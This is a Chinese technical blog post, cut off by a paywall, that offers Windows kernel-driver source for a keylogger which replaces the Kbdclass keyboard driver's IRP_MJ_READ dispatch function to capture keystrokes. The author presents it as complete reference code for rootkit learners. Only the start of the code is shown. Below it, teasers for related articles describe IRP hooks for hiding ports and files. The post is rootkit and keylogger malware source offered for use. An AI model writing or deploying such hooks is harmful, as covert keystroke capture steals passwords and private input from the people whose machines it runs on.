IRP Hook 键盘Logger

最新推荐文章于 2021-03-02 11:26:22 发布
原创 最新推荐文章于 2021-03-02 11:26:22 发布 · 4.6k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#hook #null #input #keyboard #delay #file

本文作者cogito,基于combojiang的IRP Hook系列,实现了键盘Logger的代码示例。该KeyLogger采用IRP_MJ_READ分发函数替换原键盘驱动的方法,回调函数中记录并打印键盘码。在卸载时,通过取消Pending状态的IRP以避免等待额外按键。

 作 者: cogito

前天拜读combojiang 的rootkit hook 系列之[五] IRP Hook全家福(原帖:http://bbs.pediy.com/showthread.php?t=60022)之后,决定用文中的第三种方法实现一个KeyLogger。但是combojiang前辈并没有放上Demo,而且我在网上貌似也没找着完整的IRP Hook 键盘Logger实例,于是就写了一个,权当是为学习rootkit 的新人提供一份完整的参考代码(当然,我也是驱动新人),大牛请无视。

承achillis 前辈指教,我修改了卸载函数,卸载时把处于Pending状态的那个IRP取消掉,这样不需要再等待一个按键。

本例只替换原键盘驱动中的IRP_MJ_READ分发函数,并在回调函数中简单打印出键盘码。

主要代码如下:

代码: 
#include <wdm.h>
#include <ntddkbd.h>
#include "IRPKlog.h"

//要获取的设备驱动名
#define KBD_DRIVER_NAME L"//Driver//Kbdclass"
//保存原有分发函数指针
PDRIVER_DISPATCH OldDispatchRead;
//保存键盘驱动设备对象
PDRIVER_OBJECT KbdDriverObject;
//未完成的IRP数目,不跟踪的话卸载驱动时会死得很难看
int numPendingIrps = 0;
extern POBJECT_TYPE IoDriverObjectType;
//保存当前pending的IRP 用于卸载时取消
PIRP PendingIrp = NULL;

BOOLEAN
CancelKeyboardIrp(IN PIRP Irp)
{
    if (Irp == NULL)
    {
        DbgPrint( "CancelKeyboardIrp: Irp error/n" );
        return FALSE;
    }
  
    //
    // 这里有些判断不是必须的,不过还是小心点好
    //
    if ( Irp->Cancel || Irp->CancelRoutine == NULL )
    {
        DbgPrint( "Can't Cancel the irp/n" );
        return FALSE;
    }
  
    if ( FALSE == IoCancelIrp( Irp ) )
    {
        DbgPrint( "IoCancelIrp() to failed/n" );
        return FALSE;
    }
  
    //
    // 取消后重设此例程为空
    /
最低0.47元/天 解锁文章
IRP HOOK 拦截ring0驱动层的IRP包.ring0 rootkit hook
01-24
IRP HOOK 拦截ring0驱动层的IRP包.ring0 rootkit hook
irp hook来隐藏端口(过vista)
05-16
irp hook来隐藏端口(过vista)
x86 IRP HOOK
XboxMicro
02-26 1479
内核中一个很好的隐藏位置是每个设备驱动程序中包含的函数表。在安装驱动程序时,它初始化一个函数指针表,这些指针包含了它的各种类型I/O请求报文(I/O Request Packet IRP)处理函数的地址。IRP处理多种类型的请求,例如读、写和查询。由于驱动程序处于控制流中非常低的层次,因此它们是理想的钩子位置。 以下是微软公司DDK定义的标准IRP类型列表: // Define the
IRP Hook
LYSM
03-02 1178
谈到irp拦截,基本上有三种方式 在起点拦截 在半路拦截 在终点拦截 下面我们会详细分析这几种方式哪些是有效的,哪种是无效的。 要理解这几种拦截,我们需要看看irp地传送过程。 (注意并不是每种IRP都经过这些步骤,由于设备类型和IRP种类的不同某些步骤会改变或根本不存在。) 一、IRP创建。 由于IRP开始于某个实体调用I/O管理器函数创建它,可以使用下面任何一种函数创建IRP: IoBuildAsynchronousFsdRequest 创建异步IRP(不需要等待其完成)。该函数和下一个函数仅适
IRP HOOK
zyorz的博客
05-04 953
流程相比较R3 HOOK,R0的HOOK还是比较简单的(毕竟共享一块内存)直接IoGetDeviceObjectPointer根据名称获取驱动对象,然后更改分发函数数组元素即可HOOK指定IRP分发函数实现NTSTATUS InstallTCPDriverHook() { NTSTATUS ntStatus; UNICODE_STRING deviceTCPUnicode
RootKit之[五] IRP Hook全家福
08-25 1347
 作 者: combojiang时 间: 2008-02-22,16:42链 接: http://bbs.pediy.com/showthread.php?t=60022年过得真快,马上过完了。我们今天一起来汇总看看IRP HOOK的方法。又是长篇大论,别着急,慢慢看。谈到irp拦截,基本上有三种方式,一种是在起点拦截,一种是在半路拦截,一种是在终点拦截。 下面我们会详细分析这几种方式哪些是有效的
通过IRPhook实现键盘记录
zfdyq
10-12 2154
测试机器:win7x86
基于inline hook的PS/2与USB键盘兼容日志记录实现
“inline hook 可以实现兼容PS/2键盘和USB键盘Logger 源代码”这一标题所揭示的技术核心,是一种基于内核层的高级键盘监控机制,其目标是实现一个既能兼容传统PS/2接口键盘,又能无缝支持现代USB接口键盘的系统级...
inline hook 可以实现兼容PS/2键盘和USB键盘的Logge 源代码
10-21
键盘LoggerHook 键盘类驱动Kbdclass的分发函数,在类驱动的下面是端口驱动。用DeviceTree 可以看到PS/2键盘的端口驱动是i8042prt,USB键盘的端口驱动是Kbdhid。无论是PS/2 键盘还是USB键盘,在端口驱动处理完IRP...
基于HOOK API与远程线程的文件隐藏实现解析
Windows系统通过IRP(I/O请求包)机制处理文件系统请求,`NtQueryDirectoryFile`函数负责向文件系统驱动发送查询请求,并接收返回的文件信息结构体(如`FILE_DIRECTORY_INFORMATION`)。通过修改这些结构体,可以...
Klog 1.0:基于内核过滤驱动的简易键盘记录工具
Klog 1.0 Clandestiny 是一个由开发者 Clandestiny 编写的键盘过滤驱动程序,旨在展示如何利用 Windows 内核模式下的驱动程序开发技术,实现一个简单的键盘记录器(Key Logger)。该项目的共享背景源于网络资源的...
[IRP HOOK] 键盘过滤驱动学习
weixin_30537451的博客
05-23 247
标题:[IRPHOOK]键盘过滤驱动学习作者:0xFFFFCCCC时间:2012-05-20链接:http://hi.baidu.com/pushad/item/0d335810261c38483a176ee8 IRPHOOK这个篇幅整整学习了大半个多月,中间穿插了驾照考试第二科目,然后5.1回家十多天; 真的发现,学东西是速成的,断断续续拖拖拉拉的...
[寒江独钓] IRP HOOK 键盘过滤之替换原键盘分发函数
weixin_30691871的博客
05-23 194
标题:[IRPHOOK]键盘过滤驱动学习 作者:0xFFFFCCCC 时间:2012-05-20 链接:http://hi.baidu.com/pushad/item/0a78c3ba0812e6afeaba9399 MajorFunction.h #ifndef _MAJORFUNCTION_HEADERS_ #define _MAJORFUNCTIO...
IRPhook
weixin_34384557的博客
10-21 459
原理:直接IoGetDeviceObjectPointer根据名称获取驱动对象,然后更改分发函数数组元素即可HOOK指定IRP分发函数。//irphook.h /////////////////////////////////////////////////////////////////////////////////////// typedef BOOLEAN BOOL; typedef ...
IRP Hook检测
Returns' Station
05-11 1128
1 BOOL IRPHookChk(IN PUNICODE_STRING pObjName) 2 { 3 PDRIVER_OBJECT pdrv = 0; 4 NTSTATUS status = ObReferenceObjectByName(pObjName,OBJ_CASE_INSENSITIVE,0,0,IoDriverObjectType,KernelMo
C#实现Hook功能
weixin_30567225的博客
07-19 1185
C#实现Hook功能 发布一个自己写的用于Hook.Net方法的类库,代码量不大,完全的C#代码实现,是一个比较有趣的功能,分享出来希望能和大家共同探讨安装:Install-PackageDotNetDetour源码:https://github.com/bigbaldy1128/DotNetDetour1.为何想做这个说到hook大家都应该不陌生,就是改变函数的执行流程,让...
文件重定向(hook IRP_MJ_CREATE)
whatday的专栏
09-12 3051
Windows的I/O管理器提供了一个方便的方法来重定向一个文件对象。通常使用文件过滤驱动(在文件打开和文件创建的操作中)实现该方法。操作方法如下: 1、在IRP_MJ_CREATE的分发函数中,获得FILE_OBJET的FileName属性。 2、用目标文件的完整路径替换原有的文件名字。这个全名,包括卷设备对象的名字(例如,Device/HardDiskVolume0/Directo
键盘过滤驱动之IRP劫持
北极星2003的专栏
06-09 6772
参考资料:[1] 《Rootkits——Windows内核的安全与防护》[2] 让一切输入都难逃法眼(驱动级键盘过滤钩子)本文主要介绍通过劫持IRPIRP_MJ_READ)实现键盘过滤驱动的基本方法。算是学习总结吧。这里简单地列举了几个需要注意的地方:[1] 由于需要动态卸载驱动程序,所以要挂接KeyboardClass0。[2] 键盘过滤驱动工作在异步模式。为了得到一个按键操作,首先会
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值